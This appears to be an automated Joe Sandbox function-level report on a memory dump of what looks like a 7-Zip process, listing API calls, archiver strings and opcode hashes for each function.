                                                                                                                                                                                                                                                  • String ID: Decoding ERROR
                                                                                                                                                                                                                                                  • API String ID: 117389134-2585761706
                                                                                                                                                                                                                                                  • Opcode ID: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
                                                                                                                                                                                                                                                  • Instruction ID: 69d0933ed36bf7ce59572e3eff12e0317af532730b0ee6e95c8bc4f85ed65514
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9231C4A33699C181CA30EB25EA803EEB361F7C17A0F449522DB9E47769DF78C985C701
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00976464: FreeLibrary.KERNELBASE(?,?,?,009764E7), ref: 00976475
                                                                                                                                                                                                                                                    • Part of subcall function 00973404: free.MSVCRT ref: 00973431
                                                                                                                                                                                                                                                    • Part of subcall function 00973404: memmove.MSVCRT ref: 0097344C
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 0099A8CA
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 0099A8E8
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 0099A908
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 0099A985
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 0099A996
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressProcfree$FreeLibrarymemmove
                                                                                                                                                                                                                                                  • String ID: CreateObject$SetCaseSensitive$SetLargePageMode
                                                                                                                                                                                                                                                  • API String ID: 852969883-606380122
                                                                                                                                                                                                                                                  • Opcode ID: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
                                                                                                                                                                                                                                                  • Instruction ID: b1b2052740730f05ddf7bb60c20c56d99ae25d324e5168a2ffc5f96f919e6e85
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7141AF36200B4087DF24EF2AE85075E7364FB85B98F4885249F9E47765EF38D986C380
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • strcmp.MSVCRT ref: 009BB723
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009BB743
                                                                                                                                                                                                                                                    • Part of subcall function 009738C8: memmove.MSVCRT(0097A0E5), ref: 00973907
                                                                                                                                                                                                                                                    • Part of subcall function 00973A64: memmove.MSVCRT ref: 00973AAA
                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 009BB49E
                                                                                                                                                                                                                                                    • Part of subcall function 00973404: free.MSVCRT ref: 00973431
                                                                                                                                                                                                                                                    • Part of subcall function 00973404: memmove.MSVCRT ref: 0097344C
                                                                                                                                                                                                                                                  • strcmp.MSVCRT ref: 009BB4E3
                                                                                                                                                                                                                                                  • wcscmp.MSVCRT ref: 009BB502
                                                                                                                                                                                                                                                  • strcmp.MSVCRT ref: 009BB568
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memmovestrcmp$CountTickfputsfreewcscmp
                                                                                                                                                                                                                                                  • String ID: .
                                                                                                                                                                                                                                                  • API String ID: 591578422-4150638102
                                                                                                                                                                                                                                                  • Opcode ID: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
                                                                                                                                                                                                                                                  • Instruction ID: c41096fb3390eb610dcec926f70b6b04fb627c33f6f49d7a31fdf5a0a3d4b18d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 36A13677700A84EBCA29DF2AD69029D7361F794B90F808016EB5E47B51DFB4E8B6C700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00999BCC: free.MSVCRT ref: 00999C11
                                                                                                                                                                                                                                                    • Part of subcall function 00999BCC: free.MSVCRT ref: 00999C19
                                                                                                                                                                                                                                                    • Part of subcall function 00999BCC: free.MSVCRT ref: 00999C3B
                                                                                                                                                                                                                                                    • Part of subcall function 00999BCC: free.MSVCRT ref: 00999D2A
                                                                                                                                                                                                                                                  • wcscmp.MSVCRT ref: 00999E66
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 00999ECA
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 00999ED4
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 00999F13
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 00999F1B
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 00999F28
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 00999F49
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 00999F51
                                                                                                                                                                                                                                                    • Part of subcall function 00973404: free.MSVCRT ref: 00973431
                                                                                                                                                                                                                                                    • Part of subcall function 00973404: memmove.MSVCRT ref: 0097344C
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$memmovewcscmp
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3584677832-0
                                                                                                                                                                                                                                                  • Opcode ID: d0aa5396e947f703ac514a2bac08324cffc8975aa9933586a56ea8b49374fbdb
                                                                                                                                                                                                                                                  • Instruction ID: fbc91cb3ff54f12c144ffcab3572a9a657e52386d74ca28a6caf86b47a7511a5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0aa5396e947f703ac514a2bac08324cffc8975aa9933586a56ea8b49374fbdb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4641F723318A4091CE10EF1AE84026FA765F7C5BE8F849116EF6E47769DF39C84AC700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009B2F7E
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009B2F9D
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009B2FB6
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009B2FC1
                                                                                                                                                                                                                                                    • Part of subcall function 00972C78: free.MSVCRT ref: 00972CAE
                                                                                                                                                                                                                                                    • Part of subcall function 00972320: free.MSVCRT ref: 0097237E
                                                                                                                                                                                                                                                    • Part of subcall function 00972320: fputs.MSVCRT ref: 009723B8
                                                                                                                                                                                                                                                    • Part of subcall function 00972320: free.MSVCRT ref: 009723C4
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009B2FCC
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$fputs
                                                                                                                                                                                                                                                  • String ID: =
                                                                                                                                                                                                                                                  • API String ID: 2444650769-2525689732
                                                                                                                                                                                                                                                  • Opcode ID: 40218af8c8f5cebf14e2460a5095f74d7b39ca0d1f579d7e20a065c4070789fb
                                                                                                                                                                                                                                                  • Instruction ID: 45abac4953e26a8f7765f26790cf0b34ac8234bcf2b170498149faa974c779bc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40218af8c8f5cebf14e2460a5095f74d7b39ca0d1f579d7e20a065c4070789fb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3121746331854095CA20EB16E9917AEA730EBD57E4F849222FF5E47779DF28C945C700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 352749199-0
                                                                                                                                                                                                                                                  • Opcode ID: 7bb71b32ccd8ca11bad9e88b1576836c321785d074d4d8a0f920451f9c6aec85
                                                                                                                                                                                                                                                  • Instruction ID: 3157ab7d0dd334d02d1d183ebce563b73b28ee565446e5599868882fc9fecb12
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7bb71b32ccd8ca11bad9e88b1576836c321785d074d4d8a0f920451f9c6aec85
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68313A75114B42CADB40DF28FAA439A77A6F784BB4F504226E6AA436B5DF3CC845CB00
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 352749199-0
                                                                                                                                                                                                                                                  • Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                                                                  • Instruction ID: 9fc5513c0cd9cc20c213060102e5ead8c3596a88de282bc277cbfe8dc98d2585
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B21FD75214B4286EB00DF28FD6439A7765F7847B4F501226E6A9437B5DF3CC445CB00
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 352749199-0
                                                                                                                                                                                                                                                  • Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                                                                  • Instruction ID: 9fc5513c0cd9cc20c213060102e5ead8c3596a88de282bc277cbfe8dc98d2585
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B21FD75214B4286EB00DF28FD6439A7765F7847B4F501226E6A9437B5DF3CC445CB00
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 352749199-0
                                                                                                                                                                                                                                                  • Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                                                                  • Instruction ID: 9fc5513c0cd9cc20c213060102e5ead8c3596a88de282bc277cbfe8dc98d2585
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B21FD75214B4286EB00DF28FD6439A7765F7847B4F501226E6A9437B5DF3CC445CB00
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 899f08306957a66c740d4174f20d1bdb533731c698e095d3b789b8ce7f7e4d05
                                                                                                                                                                                                                                                  • Instruction ID: ab929c759c24a2cb037012af6170544b8d406001fd5fd512f4da10ed4d01c385
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 899f08306957a66c740d4174f20d1bdb533731c698e095d3b789b8ce7f7e4d05
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B118C63764A8496CA21BF2BD9916292324FB93BA07588221EF2D17795DF24C863C310
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 29f7608983fcae077df9a41f20b4e1c47ea80a41590d90ea80717b354026d7b0
                                                                                                                                                                                                                                                  • Instruction ID: ff027d78fc0b59d0090c9c3978cfc8f770acd91144e14b36220492b6692e7fcd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29f7608983fcae077df9a41f20b4e1c47ea80a41590d90ea80717b354026d7b0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C11B322326A4085CF19EF7AC8A162C7320FBC1F99B548662AF7E4B765CF24C846C354
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 3c674b90aae9c7a3b63d2bdd2af22403dde61106ae7c1b39dd43b612bf24b9b2
                                                                                                                                                                                                                                                  • Instruction ID: 9a49cbab0d82ca072cc5d70e13d37019d4db06e99015b6b34e2d7933f48bad1a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c674b90aae9c7a3b63d2bdd2af22403dde61106ae7c1b39dd43b612bf24b9b2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4512A63204A4491CF10EF25D4907AE6721F7D6FC8F909122EE5E97729DF78CA8AC741
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009B15D5
                                                                                                                                                                                                                                                    • Part of subcall function 009BB1C8: memset.MSVCRT ref: 009BB20D
                                                                                                                                                                                                                                                    • Part of subcall function 009BB1C8: fputs.MSVCRT ref: 009BB232
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs$memset
                                                                                                                                                                                                                                                  • String ID: Extracting archive: $Open$Testing archive:
                                                                                                                                                                                                                                                  • API String ID: 3543874852-295398807
                                                                                                                                                                                                                                                  • Opcode ID: 57ce32b18a297629e4857599c7fb9a690bf538672504f27dd934718ea67813a2
                                                                                                                                                                                                                                                  • Instruction ID: 12e9557fb1bd9e576460279b2e33f9272377cf4b30d931ccf4e21b68751d533f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57ce32b18a297629e4857599c7fb9a690bf538672504f27dd934718ea67813a2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4811C42375268284EF50DB29DA647EC2364E794FA8F5C8431DE0D4B355EF38C48AC310
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009B2E47
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009B2E57
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009B2EA4
                                                                                                                                                                                                                                                    • Part of subcall function 009B2CFC: fputs.MSVCRT ref: 009B2D41
                                                                                                                                                                                                                                                    • Part of subcall function 009B2CFC: fputs.MSVCRT ref: 009B2DCF
                                                                                                                                                                                                                                                    • Part of subcall function 009B2CFC: free.MSVCRT ref: 009B2DFF
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs$free
                                                                                                                                                                                                                                                  • String ID: =
                                                                                                                                                                                                                                                  • API String ID: 3873070119-2525689732
                                                                                                                                                                                                                                                  • Opcode ID: 5f170de45124cbf05d2114cb4ce541d5ab7e7f6622d8dac823fc30cd2b14e81d
                                                                                                                                                                                                                                                  • Instruction ID: 29e7509ce578295f6f37815298356e318368525903d908a3647b9ff7a6618c87
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f170de45124cbf05d2114cb4ce541d5ab7e7f6622d8dac823fc30cd2b14e81d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CBF01D92714A0091DA20A726EE5577E5361EBD5FF4F08D321AE6E0BBA9DF28C9468700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009A4A5C
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009A4A67
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009A4AE4
                                                                                                                                                                                                                                                    • Part of subcall function 00973314: memmove.MSVCRT ref: 00973339
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009A4B0F
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009A4B1A
                                                                                                                                                                                                                                                    • Part of subcall function 00972130: malloc.MSVCRT ref: 00972134
                                                                                                                                                                                                                                                    • Part of subcall function 00972130: _CxxThrowException.MSVCRT ref: 0097214F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$ExceptionThrowmallocmemmove
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3352498445-0
                                                                                                                                                                                                                                                  • Opcode ID: cd356717b46294ebbf87faeea91df8213fb96c8abb4be4db24926ca1e4725612
